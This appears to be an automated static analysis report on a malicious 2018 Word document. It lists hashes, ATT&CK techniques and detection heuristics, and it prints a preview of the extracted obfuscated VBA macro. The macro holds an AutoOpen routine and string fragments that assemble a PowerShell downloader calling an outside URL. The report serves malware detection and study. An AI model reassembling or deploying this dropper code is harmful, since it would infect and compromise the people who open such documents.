Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6c81a06228b68121…

MALICIOUS

Office (OLE)

133.5 KB Created: 2018-02-13 08:01:00 Authoring application: Microsoft Office Word First seen: 2018-02-19
MD5: 616ffd723dd5729b19fb0936175a51ad SHA-1: 72a5b72fa0ecca24ac55789cb19781ec9f0d6a27 SHA-256: 6c81a06228b68121daed85eeaff04fea88620dc3681ebe6ec34494b279ae8acb
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function, a common technique for executing arbitrary commands. The macro's obfuscated nature and the presence of the Shell() call strongly suggest it's designed to download and execute a secondary payload, aligning with dropper malware behavior. The ClamAV detection further supports its malicious classification.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6447493-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6447493-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 27928 bytes
SHA-256: e94015899c119c389291fb84354016b4e981560da34538f413c151b9bece66d0
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "zCXjiKlX"
Sub AutoOpen()
On Error Resume Next
DbJShHFwQ = TaIEonJ - Sgn(BFmhpI) - (4733504 - Tan(5556505) / 2810340 - ChrW(BCAAjqJPG))
iqcpWRmbR = XfH - Sgn(mArNWlAuEs) - (6082448 - Tan(9135478) / 2799740 - ChrW(TrRuZhf))
YYQPPChGb = utUOzsdmdFjl - Sgn(JaDTHajcFaC) - (2728690 - Tan(5314530) / 5217272 - ChrW(GjTndBkBuFUwoI))
Application.Run "GJdWYqoY", ZmpfWJiQrQwXSz
vbvmpGoMj = frOoTRAX - Sgn(jfumwI) - (6563404 - Tan(4775318) / 4857342 - ChrW(NncvU))
KwGbmUIuz = HlmvhcFwhIcAo - Sgn(iHhPDWmDwuiULY) - (7217208 - Tan(9408882) / 4542484 - ChrW(vtoXvdrjIqu))
nrJKGzfms = dGDprRNRjLkk - Sgn(FvLGLEYXNwJI) - (578662 - Tan(4082231) / 2097654 - ChrW(bGKi))
End Sub
Function ZmpfWJiQrQwXSz()
On Error Resume Next
UClwCvDz = ZsmUMj - Sgn(qUJidKI) - (4721237 - Tan(2065442) / 7142801 - ChrW(qnROACWiiUAItB))
ibAVb = mzldLwCs - Sgn(wrHCI) - (3046709 - Tan(3445754) / 1931161 - ChrW(fzuzKsjziAAp))
KmBCP = PdGYL - Sgn(hZzovHRJvUW) - (3604471 - Tan(465863) / 8106818 - ChrW(NEcomtu))
PYuLGUDU = BWiPjJl + Mid(zRAlf + "SsBZYYwwLPPbB+Pb'+'Be/oDV'+'rtfgb+fgbs3+ts3Tufgb'+'+fgb2/ts3+ts3Eo1.Splfgb+fgbts3fgb+fgb+ts3itts3+ts3(Ets3+ts3ots3+ts31ts3+ts'+'3?ts3+ts3Eots3+fgb+fgbtsjzSRnhc" + YqUacoh, 11, 142)
DSjwKw = dMhzzuCZdjYt - Sgn(LlnDnhhRYmNX) - (2598395 - Tan(512586) / 6377762 - ChrW(dztKGkBTuUqYF))
aKEjza = zjlpEvV - Sgn(BLAWEZTamrVdz) - (7098924 - Tan(6058974) / 6636748 - ChrW(bjTJTrJMGn))
VSXuIRH = lYwlaizhJk - Sgn(czThwDbSOA) - (613631 - Tan(1766568) / 5513532 - ChrW(CmhUr))
ijoiNVRi = OBrTkbivj + Mid(fcPj + "PjfahVPiAHzQnGa+PbBfgb+fgb (Ets3+ts3oPb'+'B+PbBt'+'s3'+'+ts31.ts3+ts3exEo1+fgb+f'+'gb'+'ts3+ts3Eo1ts3+ts3ets3fgb+fgb+'+'ts3Eo1);fots3+ts3reacts3+ts3h(ofgbzBDWj" + zpti, 16, 139)
FNEfh = PNSbhqOfTFUYAa - Sgn(iNj) - (1046260 - Tan(6671584) / 9405590 - ChrW(bmZJNEGzXJfVXk))
EvrGbu = UOQF - Sgn(SnlLn) - (9614443 - Tan(5925860) / 748728 - ChrW(oUp))
cSQSSoY = TmfBXcJZUiKtiC - Sgn(YtSodmd) - (7674238 - Tan(233212) / 2595619 - ChrW(PZCwippX))
dhMUqzJw = wmloOsjD + Mid(nzYvvGT + "ZkkdziICiVLts3PbB+PbB+ts3fgb+fgbyts3fgb+fgb+t'+'s3/?http:'+'ts3+ts3//wwt'+'s'+'3+ts3wts3+ts3.bats3+fgb+fgbtfgb+fgbs3by-glf'+'gb+fgbamouts3+ts3rts3+ts3.dt'+'s3+PbB+P'+'bBts'+'3GFhTmncLziwzBOIELYwTDKaO" + lsFkoYhiOVZY, 10, 166)
DKsNU = TzacAhBfjavNUM - Sgn(qLJdKOzw) - (5872203 - Tan(7792085) / 5159405 - ChrW(ObEFO))
wqJbiMh = wsi - Sgn(tiiLJPDsos) - (4402076 - Tan(52036) / 6129057 - ChrW(LawkUAvnZVmE))
XKPsRz = UhMXUoIRfw - Sgn(EkslAhpOvPunEM) - (4776016 - Tan(6426041) / 7225535 - ChrW(FIYF))
YCrJOsr = waSqovl + Mid(EaSIvMfHWfMMpw + "vO]'+'-joiNts3ts3)(((ts3oPbB+PbBH8nts3+tsPbB+PbB3sadaPbB+PbBsdfgb+fg'+'b = &(Eo1nEts3+ts3o1+fgb+fgbEots3+ts31PbB+P'+'b'+'Be'+'Ets3+tfgbHZtkfJMPimcqhE" + oBNjWWAVEH, 3, 133)
JOlDEdVSYs = bzAJZXMmCYsO - Sgn(HjpYb) - (3531821 - Tan(2527339) / 5477664 - ChrW(wUI))
WwJrX = UJHFzLG - Sgn(VjizkPfuWjX) - (2283069 - Tan(6479455) / 117977 - ChrW(FhvtMNbCjA))
MSCbJhZI = DDiw - Sgn(hIZlAGZq) - (479443 - Tan(6539114) / 6584759 - ChrW(MzwkTfBXD))
HntjzBp = jLcVCMXWjbzf + Mid(IKnrjYIPatH + "lvzDQoYcGPCcQcMbmzcLCXvLWoLAG]34  -cREplaCets3ocnts3,[chaPbB+fgb+fgbPbBR]9PbB+PbB2 -RepPbB+PbBLacfgb+fgbe fgb+fgb([chaR]111+[c'+'haR]72+[ch'+'aR]56),[chaR]36 -RepLace  ts39WKts3fgb+fgb,[chaR]96 -fgb+jT" + vGXLZ, 30, 170)
FGQqcrBi = WjX - Sgn(YUPOBrWEa) - (2581532 - Tan(8101972) / 1128494 - ChrW(EBGtcEB))
wSplGcjiOa = Pwb - Sgn(twpTvG) - (5501343 - Tan(871072) / 7436723 - ChrW(qao))
IFiGcwjiP = XHuh - Sgn(AYMtncKtfWaJW) - (7681512 - Tan(89896) / 1574495 - ChrW(hliGNBjDLjEWh))
qrTZaFTltJr = tYuiCwdMc + Mid(ZLqDHP + "DJmAHnhfLEPLAce(([chaR]99+[chaR]1pOKXXIvZjD " + wIFqifzpj, 10, 24)
dwsjjzHMCfA = futuPSTMrtQYE - Sgn(wiVnRAM) - (5030230 - Tan(9004359) / 6194703 - ChrW(zGuODZdWluPJ))
IhTpvodKWj = XENdjDowtISw - Sgn(ataiFzNEQMYzo) - (3733784 -
... (truncated)